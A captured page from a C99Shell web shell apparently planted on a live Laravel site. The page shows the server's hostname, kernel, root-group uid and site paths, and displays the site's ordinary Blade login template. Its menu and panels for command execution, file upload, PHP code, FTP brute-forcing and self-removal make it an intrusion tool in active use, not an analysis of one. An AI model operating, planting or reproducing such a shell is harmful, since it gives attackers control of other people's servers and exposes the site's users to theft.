!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smab.picotech.app/public_html/resources/views/frontend/user/   drwxr-xr-x
Free 23.7 GB of 117.98 GB (20.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     login.blade.php (2.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('frontend.layouts.app', ['class' => 'bg-purple'])
@section('content')

<!--==== START CONTENT ====-->
<section class="my-5" >
  <div class="row row2 login-box">
      <div class="col-md-4 col-xl-4 col-sm-12 ">
        <div class="login-form">
          <div class="heading-xs my-2 text-center">{{ __('login')['login_now'] }}</div>
          <span class="text-center">Enter your email address and password to access {{config('settingConfig.config_store_name')}} account</span>
            <form  method="post" action="{{ route('customer.login') }}" class="my-3">
                @if(Session::has('autherror'))
                    <div class="text-center bg-danger p-2 my-2 round">
                      <strong class="text-white">{!! \Session::get('autherror') !!}!</strong>
                  </div>
                @endif
                @csrf
                <div class="form-group">
                    <label for="email" class="form-label"> {{ __('commoninput')['email'] }} <span class="text-danger"> * </span> </label>
                    <input type="email" class="form-control" id="email" name="email" placeholder="{{ __('commoninput')['placeholder_email'] }}" value="{{old('email')}}">
                    {!!$errors->first("email", "<span class='text-danger'>:message</span>")!!}
                </div>
                <div class="form-group">
                    <label for="password" class="form-label"> {{ __('commoninput')['placeholder_password'] }} <span class="text-danger"> * </span> </label>
                    <input type="password" class="form-control login-pass" id="password" name="password" placeholder="{{ __('commoninput')['your'] }} {{ __('commoninput')['placeholder_password'] }}..." value="{{old('password')}}">
                    <span class="see-password-section">
                        <i class="fa fa-eye-slash"></i>
                    </span>


                    {!!$errors->first("password", "<span class='text-danger'>:message</span>")!!}
                </div>
                <div class="text-center">
                    <button type="submit" id="submitlogin" value="submitlogin" class="submitbtn btn-lg">{{ __('registration')['button_login'] }}</button>
                </div>
                <div class="signup-section mt-2">{{ __('login')['label_registration_info'] }} <a href="{{route('customer.getregister')}}" class="sign-up "> {{ __('login')['button_registration'] }}</a>.</div>

            </form>
        </div>
      </div>
      <div class="d-none d-md-block d-xl-block d-xl-block col-md-8 col-lg-8 col-xl-8 ">
        <img src="{{asset('frontend')}}/images/login-bg.png" alt="">
      </div>
  </div>
</section>
<!--==== END CONTENT ====-->

<style media="screen">
.row2 {
 --bs-gutter-x: 0rem;
}
</style>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--